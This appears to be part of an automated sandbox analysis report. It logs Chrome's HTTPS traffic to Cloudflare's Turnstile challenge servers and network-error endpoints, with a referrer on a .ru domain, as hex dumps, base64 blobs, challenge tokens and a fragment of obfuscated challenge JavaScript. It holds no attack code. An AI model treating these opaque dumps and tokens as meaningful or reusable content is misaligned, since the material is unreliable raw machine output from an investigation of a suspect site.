                                                                        2025-01-16 08:20:20 UTC1369INData Raw: 32 38 29 5d 28 64 5b 69 59 28 31 32 30 39 29 5d 28 73 2c 4b 29 29 2c 4b 3d 30 29 3a 4c 2b 2b 2c 50 3e 3e 3d 31 2c 43 2b 2b 29 3b 46 3d 28 47 2d 2d 2c 30 3d 3d 47 26 26 28 47 3d 4d 61 74 68 5b 69 59 28 31 30 31 34 29 5d 28 32 2c 49 29 2c 49 2b 2b 29 2c 44 5b 4f 5d 3d 48 2b 2b 2c 53 74 72 69 6e 67 28 4e 29 29 7d 69 66 28 64 5b 69 59 28 34 30 34 29 5d 28 27 27 2c 46 29 29 7b 69 66 28 4f 62 6a 65 63 74 5b 69 59 28 34 37 30 29 5d 5b 69 59 28 31 36 31 32 29 5d 5b 69 59 28 31 33 34 32 29 5d 28 45 2c 46 29 29 7b 69 66 28 32 35 36 3e 46 5b 69 59 28 31 31 37 32 29 5d 28 30 29 29 7b 66 6f 72 28 43 3d 30 3b 64 5b 69 59 28 31 36 30 36 29 5d 28 43 2c 49 29 3b 4b 3c 3c 3d 31 2c 4c 3d 3d 64 5b 69 59 28 31 32 34 33 29 5d 28 6f 2c 31 29 3f 28 4c 3d 30 2c 4a 5b 69 59 28 31
                                                                        Data Ascii: 28)](d[iY(1209)](s,K)),K=0):L++,P>>=1,C++);F=(G--,0==G&&(G=Math[iY(1014)](2,I),I++),D[O]=H++,String(N))}if(d[iY(404)]('',F)){if(Object[iY(470)][iY(1612)][iY(1342)](E,F)){if(256>F[iY(1172)](0)){for(C=0;d[iY(1606)](C,I);K<<=1,L==d[iY(1243)](o,1)?(L=0,J[iY(1


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        14192.168.2.549731104.18.94.414433504C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2025-01-16 08:20:20 UTC1171OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/1605127115:1737012352:4BXwnbtKrd766rOBoKJPowV747GdyIl9mVNQ9Ho_ywc/902caf840eaa7ce8/1F5Cxy3acQDSD_maJ2Q.C7xfmqEQ185sOhiXUEHS_w8-1737015619-1.1.1.1-Yyo.hmxqCBlzU9CQF9n2ytO._FxQAZNm3xME0QZrqZYaRcPGbk12itfJZ8VfdD4c HTTP/1.1
                                                                        Host: challenges.cloudflare.com
                                                                        Connection: keep-alive
                                                                        Content-Length: 3204
                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                        Content-type: application/x-www-form-urlencoded
                                                                        CF-Chl-RetryAttempt: 0
                                                                        sec-ch-ua-mobile: ?0
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                        CF-Challenge: 1F5Cxy3acQDSD_maJ2Q.C7xfmqEQ185sOhiXUEHS_w8-1737015619-1.1.1.1-Yyo.hmxqCBlzU9CQF9n2ytO._FxQAZNm3xME0QZrqZYaRcPGbk12itfJZ8VfdD4c
                                                                        sec-ch-ua-platform: "Windows"
                                                                        Accept: */*
                                                                        Origin: https://challenges.cloudflare.com
                                                                        Sec-Fetch-Site: same-origin
                                                                        Sec-Fetch-Mode: cors
                                                                        Sec-Fetch-Dest: empty
                                                                        Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/p7h9d/0x4AAAAAAA5D2nHjAPlCZ2mF/auto/fbE/normal/auto/
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        2025-01-16 08:20:20 UTC3204OUTData Raw: 76 5f 39 30 32 63 61 66 38 34 30 65 61 61 37 63 65 38 3d 42 4a 59 6f 75 6f 73 6f 43 6f 61 6f 4b 6e 76 66 6e 76 39 6f 6e 71 32 70 47 38 71 76 74 6e 6b 6b 76 36 44 76 32 77 6f 6e 30 76 79 6f 32 59 38 32 69 30 59 76 48 68 30 76 34 2d 6e 4c 42 76 7a 6f 6e 39 59 76 32 45 50 4a 53 4f 76 45 70 76 35 76 6e 4a 76 45 59 54 77 76 44 76 53 77 32 6b 76 70 77 68 59 76 43 47 71 53 38 76 42 52 47 68 4b 24 6f 67 64 64 4a 4d 76 45 46 50 76 74 6f 68 6d 35 62 24 68 57 37 25 32 62 4b 58 61 73 2d 42 31 36 5a 56 6f 53 5a 76 32 73 62 76 79 6d 4d 47 66 59 76 54 48 76 76 4b 77 53 24 34 62 7a 36 54 4c 70 4f 33 71 42 36 76 79 4a 62 6d 4b 43 49 76 68 73 74 72 77 4a 76 32 6b 6d 56 6e 47 79 76 34 7a 6f 67 4f 50 4a 59 34 79 79 6c 55 6f 53 6d 7a 4b 77 41 76 32 34 4e 73 4c 52 76 72 62 69
                                                                        Data Ascii: v_902caf840eaa7ce8=BJYouosoCoaoKnvfnv9onq2pG8qvtnkkv6Dv2won0vyo2Y82i0YvHh0v4-nLBvzon9Yv2EPJSOvEpv5vnJvEYTwvDvSw2kvpwhYvCGqS8vBRGhK$ogddJMvEFPvtohm5b$hW7%2bKXas-B16ZVoSZv2sbvymMGfYvTHvvKwS$4bz6TLpO3qB6vyJbmKCIvhstrwJv2kmVnGyv4zogOPJY4yylUoSmzKwAv24NsLRvrbi
                                                                        2025-01-16 08:20:20 UTC795INHTTP/1.1 200 OK
                                                                        Date: Thu, 16 Jan 2025 08:20:20 GMT
                                                                        Content-Type: text/plain; charset=UTF-8
                                                                        Content-Length: 155720
                                                                        Connection: close
                                                                        cf-chl-gen: NQgN0I9I3hRdXOPM3xEaV8GvZfaQ9mk9tTw8TJHu62uSrGBitgbu3UMnX8LUN03BvnU7DXyvJQxTMfu7Ru0ks1iRQDkuuwxkZFq7JM1JiMig+26YSumOlQIVs06XqfUdspiLeaKNVALxc6ioGJPm2DFGOZp7JLcN77OJLJmwMPuq6DxZjWC/nCdx3fxSDZDjjbEcbaqbHAAFCMOZc7wCj8EpRh7X2C9rtD1jFNTB9/cHnQ51s1fVK1bmUgzB6X9HFChiI4Apq90scBSpdn3oELuGD08FDPXdUhybbpxaycsS0kJfbloV92qJqwBNiA4t6/492TtZHrN4F8nuo2qjvBduOl+gPUkH0vUIMp1tpeI8rv+8/EkJ+jZjGXQPtQO+HJsQ8JjUpPQY5U4Pz/kbUnLurW2oD2v2w6AUy7XoJpSzglLlvtbTU/I5n4TmT8k+Syo1AHFIMW6AlLO0tYAHxUH+jSh1op5YlAh4Xlnp5TLKm0SeEjXO5JYl0WlU9gIlIIxEeUFkEP6dEQJD5QEGmg==$txw7J8FIfX+1mtnBp6qBnA==
                                                                        Server: cloudflare
                                                                        CF-RAY: 902caf8ea89d0f78-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        2025-01-16 08:20:20 UTC574INData Raw: 6d 58 4b 53 70 70 6d 76 6e 33 36 57 6e 48 36 41 75 37 53 45 75 4c 47 45 68 4a 61 35 6e 71 54 4a 75 59 79 38 78 73 47 53 77 74 6e 4f 75 4a 4f 30 7a 37 75 2b 72 72 2b 39 77 4d 48 44 32 64 72 6d 76 61 4c 73 77 4d 33 69 77 36 72 44 34 36 37 72 30 4c 61 7a 30 64 6a 71 37 74 54 4f 38 2b 32 2b 7a 66 6e 62 32 37 73 45 43 51 44 52 42 2f 33 57 7a 63 54 4e 45 74 6e 7a 33 2f 49 48 30 68 4d 57 42 42 49 58 47 76 37 73 45 41 6f 4b 33 43 54 73 46 4e 38 5a 35 78 54 36 36 2b 49 50 2f 53 73 6b 45 53 6f 70 38 68 38 6c 44 42 67 4b 4f 77 77 4d 44 6a 38 49 49 76 6f 77 4c 68 34 53 46 68 73 63 46 78 6c 4a 41 7a 59 38 43 30 41 6d 4b 79 6c 46 4a 68 4a 53 53 68 42 59 4f 78 59 6d 58 53 73 5a 4c 56 42 5a 49 43 56 6a 4a 56 51 30 54 43 63 39 51 57 34 77 51 69 31 42 5a 47 42 41 5a 55 78
                                                                        Data Ascii: mXKSppmvn36WnH6Au7SEuLGEhJa5nqTJuYy8xsGSwtnOuJO0z7u+rr+9wMHD2drmvaLswM3iw6rD467r0Laz0djq7tTO8+2+zfnb27sECQDRB/3WzcTNEtnz3/IH0hMWBBIXGv7sEAoK3CTsFN8Z5xT66+IP/SskESop8h8lDBgKOwwMDj8IIvowLh4SFhscFxlJAzY8C0AmKylFJhJSShBYOxYmXSsZLVBZICVjJVQ0TCc9QW4wQi1BZGBAZUx
                                                                        2025-01-16 08:20:20 UTC1369INData Raw: 4a 55 51 6c 31 58 4c 55 52 4b 55 6a 78 30 52 6c 46 7a 62 32 39 4c 55 30 6b 33 61 48 46 6f 54 6d 78 2b 63 47 4a 33 5a 56 42 59 59 56 39 63 61 6f 4b 41 66 59 5a 48 53 48 36 52 59 59 46 33 62 6d 70 73 62 5a 31 6c 6c 58 57 53 6d 35 39 30 62 6f 4a 33 66 48 4f 54 59 4b 4a 71 66 61 79 50 6e 49 79 6c 6c 47 79 68 73 35 43 53 71 6f 4a 34 73 6f 70 31 65 71 31 33 71 70 71 2f 6f 6e 36 57 66 70 61 37 78 34 79 72 79 35 71 59 69 59 76 4e 7a 4d 6a 53 31 5a 44 48 31 72 44 55 7a 35 72 41 79 72 7a 44 6f 74 2f 54 32 4c 79 65 32 2b 6a 59 77 61 6a 6a 78 65 6a 41 72 4f 53 76 34 2b 76 32 78 64 6a 6f 31 2b 53 76 39 64 66 79 79 76 47 2f 32 75 54 30 43 50 6a 66 31 74 72 64 33 67 48 37 42 74 34 49 37 41 73 48 38 39 44 35 45 65 66 34 33 4d 2f 33 32 68 51 43 38 77 4c 67 2f 42 41 5a 48
                                                                        Data Ascii: JUQl1XLURKUjx0RlFzb29LU0k3aHFoTmx+cGJ3ZVBYYV9caoKAfYZHSH6RYYF3bmpsbZ1llXWSm590boJ3fHOTYKJqfayPnIyllGyhs5CSqoJ4sop1eq13qpq/on6Wfpa7x4yry5qYiYvNzMjS1ZDH1rDUz5rAyrzDot/T2Lye2+jYwajjxejArOSv4+v2xdjo1+Sv9dfyyvG/2uT0CPjf1trd3gH7Bt4I7AsH89D5Eef43M/32hQC8wLg/BAZH
                                                                        2025-01-16 08:20:20 UTC1369INData Raw: 6b 58 30 46 43 52 47 6c 32 63 30 4a 36 54 58 6f 7a 57 57 70 50 61 45 70 2f 62 57 42 5a 65 48 42 54 63 32 74 32 65 45 70 58 64 32 42 4b 67 59 68 67 66 30 31 79 5a 5a 65 45 65 6e 68 62 58 70 4e 31 57 4a 6c 5a 66 6e 36 67 6f 34 64 33 66 32 52 6f 65 49 36 6a 68 5a 43 4c 70 59 69 31 71 4a 69 79 73 70 6d 74 71 37 43 78 74 72 65 56 6b 61 37 41 75 36 4b 54 6d 33 75 2b 6f 36 33 46 71 4a 79 63 70 63 6a 51 76 72 37 41 73 61 72 46 30 36 32 39 72 37 4f 71 72 74 7a 56 6e 38 4f 68 6e 4b 2b 34 6d 38 47 33 78 4f 4f 2f 34 65 2f 73 78 75 62 63 76 63 62 42 71 75 53 35 36 4e 6a 32 32 62 72 2b 2b 4c 2f 72 75 74 48 69 31 39 4c 59 31 66 6e 65 7a 64 7a 49 2b 65 30 50 45 68 41 54 39 39 4c 72 44 68 54 6d 35 2b 38 4f 36 68 6a 61 48 2b 37 65 4a 76 62 39 43 69 59 4a 48 79 41 70 4b 53
                                                                        Data Ascii: kX0FCRGl2c0J6TXozWWpPaEp/bWBZeHBTc2t2eEpXd2BKgYhgf01yZZeEenhbXpN1WJlZfn6go4d3f2RoeI6jhZCLpYi1qJiyspmtq7CxtreVka7Au6KTm3u+o63FqJycpcjQvr7AsarF0629r7OqrtzVn8OhnK+4m8G3xOO/4e/sxubcvcbBquS56Nj22br++L/rutHi19LY1fnezdzI+e0PEhAT99LrDhTm5+8O6hjaH+7eJvb9CiYJHyApKS
                                                                        2025-01-16 08:20:20 UTC1369INData Raw: 4c 6d 4a 54 52 6e 70 56 61 31 38 33 55 6e 34 37 54 55 46 63 57 48 79 43 57 6f 43 49 52 48 64 69 62 59 56 4f 69 6f 46 4c 6a 34 4a 77 69 34 39 75 65 46 78 50 69 31 71 54 67 59 47 42 59 48 78 2f 6b 49 68 6e 6b 34 64 31 6e 4a 64 6c 70 34 79 6c 65 34 78 31 6a 71 52 78 6d 59 4e 30 74 34 36 61 68 33 4b 77 67 6f 79 7a 78 5a 61 6f 67 63 62 42 67 73 61 45 77 63 33 45 7a 35 37 48 6a 64 61 54 77 4d 58 4b 75 72 71 77 32 37 58 5a 30 4d 32 62 32 4d 37 67 31 75 6a 6a 75 4c 76 72 31 74 72 65 72 38 6e 74 79 2f 43 78 72 4d 6d 74 79 64 71 34 39 73 58 64 33 2b 66 66 2b 75 33 77 35 50 37 5a 32 50 6a 2b 78 75 6b 42 33 41 7a 37 35 74 48 50 79 75 44 2b 39 65 54 30 35 39 4c 73 43 39 33 59 30 65 37 37 43 77 34 4e 38 75 55 52 39 53 48 7a 46 75 77 76 45 4f 77 61 4b 53 45 6b 37 77 77
                                                                        Data Ascii: LmJTRnpVa183Un47TUFcWHyCWoCIRHdibYVOioFLj4Jwi49ueFxPi1qTgYGBYHx/kIhnk4d1nJdlp4yle4x1jqRxmYN0t46ah3KwgoyzxZaogcbBgsaEwc3Ez57HjdaTwMXKurqw27XZ0M2b2M7g1ujjuLvr1trer8nty/CxrMmtydq49sXd3+ff+u3w5P7Z2Pj+xukB3Az75tHPyuD+9eT059LsC93Y0e77Cw4N8uUR9SHzFuwvEOwaKSEk7ww
                                                                        2025-01-16 08:20:20 UTC1369INData Raw: 7a 56 4f 50 58 35 39 65 34 52 54 65 49 56 77 59 30 4b 46 58 6d 68 46 58 6b 32 4f 54 56 4b 54 67 6c 46 58 6c 46 4f 61 57 46 6d 58 6a 5a 5a 30 62 35 52 67 6f 5a 71 6d 59 31 36 61 70 57 70 69 66 36 43 6f 67 6d 71 6b 61 58 4e 79 71 4b 36 4b 6b 36 78 37 75 4c 4a 35 63 61 32 71 77 72 71 62 74 73 43 46 74 62 4f 33 77 33 36 47 78 35 2b 34 67 38 2f 51 6b 35 43 66 30 61 71 7a 31 4e 61 76 70 39 43 66 73 70 71 59 34 72 54 57 77 5a 2f 49 36 4e 75 72 37 62 65 74 77 2b 37 4f 77 2f 50 6e 36 50 58 68 73 2b 48 33 79 62 7a 6d 31 37 72 32 76 39 54 51 34 4e 54 6b 34 51 54 6e 31 66 6a 43 44 51 7a 73 45 76 44 68 2f 51 76 71 36 78 6b 4a 38 74 6e 52 7a 68 33 6d 33 2f 49 65 2b 66 6e 32 2f 65 54 32 42 2f 67 56 42 75 67 6f 43 41 48 37 44 69 38 73 48 69 30 72 4d 6a 62 78 48 50 55 77
                                                                        Data Ascii: zVOPX59e4RTeIVwY0KFXmhFXk2OTVKTglFXlFOaWFmXjZZ0b5RgoZqmY16apWpif6CogmqkaXNyqK6Kk6x7uLJ5ca2qwrqbtsCFtbO3w36Gx5+4g8/Qk5Cf0aqz1Navp9CfspqY4rTWwZ/I6Nur7betw+7Ow/Pn6PXhs+H3ybzm17r2v9TQ4NTk4QTn1fjCDQzsEvDh/Qvq6xkJ8tnRzh3m3/Ie+fn2/eT2B/gVBugoCAH7Di8sHi0rMjbxHPUw
                                                                        2025-01-16 08:20:20 UTC1369INData Raw: 5a 76 68 47 42 46 57 55 42 58 56 48 39 39 57 6d 6d 51 63 32 4a 2f 61 6f 71 51 59 6f 31 54 6b 57 71 4b 63 70 4e 31 6a 4a 52 79 63 5a 4b 63 5a 6d 68 6b 58 47 4f 6b 6e 61 36 4a 6f 5a 6c 72 6b 71 71 52 6a 34 65 46 6c 61 6d 38 64 62 61 77 71 71 79 36 6f 37 71 69 67 38 4f 2f 76 37 65 54 6c 71 43 70 79 4c 36 6b 72 74 47 77 78 62 61 53 73 72 54 4b 79 4b 2f 53 76 63 36 6e 75 73 6e 56 33 62 44 6c 76 4d 43 6e 76 4b 54 46 71 72 37 63 35 71 62 4c 78 37 76 4e 37 65 47 32 34 76 48 4c 39 39 58 32 35 76 62 38 31 39 62 63 2f 4d 50 41 33 66 67 44 79 4f 4c 47 35 4e 72 72 44 65 62 6d 41 64 41 4a 42 4f 51 4e 44 50 72 53 38 42 62 77 47 65 6b 42 42 4f 4c 73 37 53 62 6a 45 68 34 58 4b 76 66 37 34 50 6f 51 47 69 73 69 41 42 34 7a 46 79 34 6a 37 42 6f 4d 43 6a 6f 50 43 55 45 75 45
                                                                        Data Ascii: ZvhGBFWUBXVH99WmmQc2J/aoqQYo1TkWqKcpN1jJRycZKcZmhkXGOkna6JoZlrkqqRj4eFlam8dbawqqy6o7qig8O/v7eTlqCpyL6krtGwxbaSsrTKyK/Svc6nusnV3bDlvMCnvKTFqr7c5qbLx7vN7eG24vHL99X25vb819bc/MPA3fgDyOLG5NrrDebmAdAJBOQNDPrS8BbwGekBBOLs7SbjEh4XKvf74PoQGisiAB4zFy4j7BoMCjoPCUEuE
                                                                        2025-01-16 08:20:20 UTC1369INData Raw: 68 69 34 35 32 61 56 42 72 58 47 53 4d 6a 31 4a 51 55 46 4a 7a 64 49 57 50 6e 33 71 62 63 6e 35 61 59 35 69 6d 6f 71 6d 49 59 48 75 4e 71 6d 36 4e 61 6f 47 75 71 6e 4b 67 71 72 47 31 64 5a 74 32 64 4a 43 70 71 34 43 30 71 73 53 4f 6e 73 4b 66 76 4c 65 6d 76 4d 53 70 78 63 7a 51 77 71 61 30 6b 36 61 65 7a 61 65 58 6b 5a 71 6f 76 70 53 33 6d 35 37 4f 35 4a 2f 67 78 61 2b 79 30 61 53 39 76 65 66 5a 7a 4c 72 4b 38 72 50 70 31 50 66 69 79 63 50 73 36 4c 4c 37 32 62 37 77 32 51 54 38 42 76 6e 57 78 64 51 43 31 65 4c 46 33 75 6a 66 79 50 33 6c 44 65 41 50 41 50 44 6e 42 2f 4d 4d 35 4f 66 58 43 68 37 75 33 4f 4c 76 2f 52 55 43 35 78 6a 35 35 78 37 33 4c 41 4d 61 38 50 34 55 44 42 38 4f 42 50 62 32 4e 79 6e 36 4f 7a 51 63 45 69 49 53 4f 42 67 42 42 45 4e 4a 4b 52
                                                                        Data Ascii: hi452aVBrXGSMj1JQUFJzdIWPn3qbcn5aY5imoqmIYHuNqm6NaoGuqnKgqrG1dZt2dJCpq4C0qsSOnsKfvLemvMSpxczQwqa0k6aezaeXkZqovpS3m57O5J/gxa+y0aS9vefZzLrK8rPp1PfiycPs6LL72b7w2QT8BvnWxdQC1eLF3ujfyP3lDeAPAPDnB/MM5OfXCh7u3OLv/RUC5xj55x73LAMa8P4UDB8OBPb2Nyn6OzQcEiISOBgBBENJKR
                                                                        2025-01-16 08:20:21 UTC1369INData Raw: 62 6f 68 6c 6b 58 4b 4c 55 31 5a 74 6a 48 74 6f 6d 49 6d 52 6b 57 2b 6b 5a 4a 57 42 68 6e 53 52 6d 71 74 6a 71 70 32 70 6d 6e 75 7a 72 61 32 32 6c 72 4a 31 63 72 5a 31 63 36 71 70 64 35 4f 2b 6a 62 36 58 77 58 33 42 73 4b 50 4b 78 35 65 72 6a 59 36 6f 76 4b 79 77 77 70 50 46 31 39 4b 76 72 4e 58 56 6d 4c 6d 77 6e 35 6a 41 72 75 4f 6c 76 4c 48 6a 30 62 4f 35 70 2b 50 4c 78 36 36 77 73 65 72 76 33 73 57 76 7a 64 6a 4e 39 4c 7a 49 35 72 6a 70 36 74 51 45 77 2b 62 59 42 39 48 46 78 41 6e 30 42 74 66 69 41 75 6f 52 2f 4d 72 71 44 2b 6a 6b 7a 78 44 4e 30 76 4d 4c 45 52 7a 54 44 50 7a 61 37 74 2f 6a 34 68 73 58 34 77 6f 62 42 43 30 5a 4d 75 67 78 4c 67 45 44 4d 50 63 4a 42 51 54 31 4f 2f 7a 32 4b 2f 63 4d 47 67 30 5a 4f 52 38 6f 46 6b 68 41 50 44 59 6e 4d 43 6f
                                                                        Data Ascii: bohlkXKLU1ZtjHtomImRkW+kZJWBhnSRmqtjqp2pmnuzra22lrJ1crZ1c6qpd5O+jb6XwX3BsKPKx5erjY6ovKywwpPF19KvrNXVmLmwn5jAruOlvLHj0bO5p+PLx66wserv3sWvzdjN9LzI5rjp6tQEw+bYB9HFxAn0BtfiAuoR/MrqD+jkzxDN0vMLERzTDPza7t/j4hsX4wobBC0ZMugxLgEDMPcJBQT1O/z2K/cMGg0ZOR8oFkhAPDYnMCo
                                                                        2025-01-16 08:20:21 UTC1369INData Raw: 5a 6d 49 64 56 69 53 6a 58 35 58 65 57 42 75 64 58 31 30 6d 33 74 39 64 61 4a 38 6a 5a 75 6b 72 6d 2b 77 62 34 74 76 67 35 57 71 71 34 79 62 6a 4b 5a 2b 72 49 36 68 65 62 69 43 73 62 2f 46 78 6f 53 32 70 73 72 4b 72 62 32 6b 6f 59 7a 4c 70 4a 4b 4d 71 63 47 55 73 4c 53 7a 76 4c 33 5a 73 36 6d 39 73 73 57 58 73 4f 65 79 76 4e 79 38 74 2b 66 68 36 4c 33 6f 78 75 62 6a 34 64 48 50 77 64 72 46 36 75 37 57 2b 76 50 56 34 74 62 73 35 4e 6e 57 38 66 6a 78 31 50 72 67 39 74 76 49 45 73 6f 48 45 68 48 75 43 74 2f 74 36 67 76 62 47 50 48 34 43 52 67 54 2f 75 50 35 45 2f 63 64 35 42 54 69 2b 65 7a 6b 48 42 76 73 48 67 55 6e 43 69 34 59 39 41 4c 7a 44 77 55 79 4f 69 38 55 4f 7a 67 79 44 78 35 46 4b 42 63 30 48 7a 39 46 54 55 49 49 52 68 38 2b 50 69 63 51 4d 6c 55 69
                                                                        Data Ascii: ZmIdViSjX5XeWBudX10m3t9daJ8jZukrm+wb4tvg5Wqq4ybjKZ+rI6hebiCsb/FxoS2psrKrb2koYzLpJKMqcGUsLSzvL3Zs6m9ssWXsOeyvNy8t+fh6L3oxubj4dHPwdrF6u7W+vPV4tbs5NnW8fjx1Prg9tvIEsoHEhHuCt/t6gvbGPH4CRgT/uP5E/cd5BTi+ezkHBvsHgUnCi4Y9ALzDwUyOi8UOzgyDx5FKBc0Hz9FTUIIRh8+PicQMlUi


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        15192.168.2.54973235.190.80.14433504C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2025-01-16 08:20:21 UTC545OUTOPTIONS /report/v4?s=GtRgaigRntOdmFOFRSYz%2FKEAFeIqzMNTOUkCjVxFEFJgP5X9FTT7UqH0bLCOY1Zk%2B%2B8%2B%2BOqj7N02ZMr9stlxUDsYEr%2FZHi1ZjfRsLLPnhhlzsN%2FJQgMU1VlfQTd4gA%3D%3D HTTP/1.1
                                                                        Host: a.nel.cloudflare.com
                                                                        Connection: keep-alive
                                                                        Origin: https://56.hanagibenewe.ru
                                                                        Access-Control-Request-Method: POST
                                                                        Access-Control-Request-Headers: content-type
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        2025-01-16 08:20:21 UTC336INHTTP/1.1 200 OK
                                                                        Content-Length: 0
                                                                        access-control-max-age: 86400
                                                                        access-control-allow-methods: OPTIONS, POST
                                                                        access-control-allow-origin: *
                                                                        access-control-allow-headers: content-length, content-type
                                                                        date: Thu, 16 Jan 2025 08:20:21 GMT
                                                                        Via: 1.1 google
                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                        Connection: close


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        16192.168.2.54973435.190.80.14433504C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2025-01-16 08:20:21 UTC484OUTPOST /report/v4?s=GtRgaigRntOdmFOFRSYz%2FKEAFeIqzMNTOUkCjVxFEFJgP5X9FTT7UqH0bLCOY1Zk%2B%2B8%2B%2BOqj7N02ZMr9stlxUDsYEr%2FZHi1ZjfRsLLPnhhlzsN%2FJQgMU1VlfQTd4gA%3D%3D HTTP/1.1
                                                                        Host: a.nel.cloudflare.com
                                                                        Connection: keep-alive
                                                                        Content-Length: 429
                                                                        Content-Type: application/reports+json
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        2025-01-16 08:20:21 UTC429OUTData Raw: 5b 7b 22 61 67 65 22 3a 30 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 34 34 32 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 35 36 2e 68 61 6e 61 67 69 62 65 6e 65 77 65 2e 72 75 2f 59 37 4d 44 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 30 34 2e 32 31 2e 39 36 2e 31 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c 22
                                                                        Data Ascii: [{"age":0,"body":{"elapsed_time":442,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://56.hanagibenewe.ru/Y7MD/","sampling_fraction":1.0,"server_ip":"104.21.96.1","status_code":404,"type":"http.error"},"type":"network-error","
                                                                        2025-01-16 08:20:21 UTC168INHTTP/1.1 200 OK
                                                                        Content-Length: 0
                                                                        date: Thu, 16 Jan 2025 08:20:21 GMT
                                                                        Via: 1.1 google
                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                        Connection: close


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        17192.168.2.549735104.18.95.414433504C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2025-01-16 08:20:21 UTC599OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/1605127115:1737012352:4BXwnbtKrd766rOBoKJPowV747GdyIl9mVNQ9Ho_ywc/902caf840eaa7ce8/1F5Cxy3acQDSD_maJ2Q.C7xfmqEQ185sOhiXUEHS_w8-1737015619-1.1.1.1-Yyo.hmxqCBlzU9CQF9n2ytO._FxQAZNm3xME0QZrqZYaRcPGbk12itfJZ8VfdD4c HTTP/1.1
                                                                        Host: challenges.cloudflare.com
                                                                        Connection: keep-alive
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                        Accept: */*
                                                                        Sec-Fetch-Site: none
                                                                        Sec-Fetch-Mode: cors
                                                                        Sec-Fetch-Dest: empty
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        2025-01-16 08:20:21 UTC442INHTTP/1.1 400 Bad Request
                                                                        Date: Thu, 16 Jan 2025 08:20:21 GMT
                                                                        Content-Type: application/json
                                                                        Content-Length: 14
                                                                        Connection: close
                                                                        cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                        cf-chl-out: k/O1kLvPKHEXRxzwxG14xWjMAJI02mJfBZw12PYt6CW2B45AWYUVW8c+BG5ttY96qcWnUgI7Vx1Z+Gj2NawAmA==$wOaKg49GrpAdddG46jccFA==
                                                                        Server: cloudflare
                                                                        CF-RAY: 902caf953c36c347-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        2025-01-16 08:20:21 UTC14INData Raw: 7b 22 65 72 72 22 3a 31 30 30 32 33 30 7d
                                                                        Data Ascii: {"err":100230}


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        18192.168.2.549736104.18.94.414433504C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2025-01-16 08:20:22 UTC811OUTGET /cdn-cgi/challenge-platform/h/b/pat/902caf840eaa7ce8/1737015620917/06803e07f083093b506a25e32cdcc8bb25dfdadec1b4ca42befeb10fcc321d4d/ZZbdEoB7MOUJd5H HTTP/1.1
                                                                        Host: challenges.cloudflare.com
                                                                        Connection: keep-alive
                                                                        Cache-Control: max-age=0
                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                        sec-ch-ua-mobile: ?0
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                        sec-ch-ua-platform: "Windows"
                                                                        Accept: */*
                                                                        Sec-Fetch-Site: same-origin
                                                                        Sec-Fetch-Mode: cors
                                                                        Sec-Fetch-Dest: empty
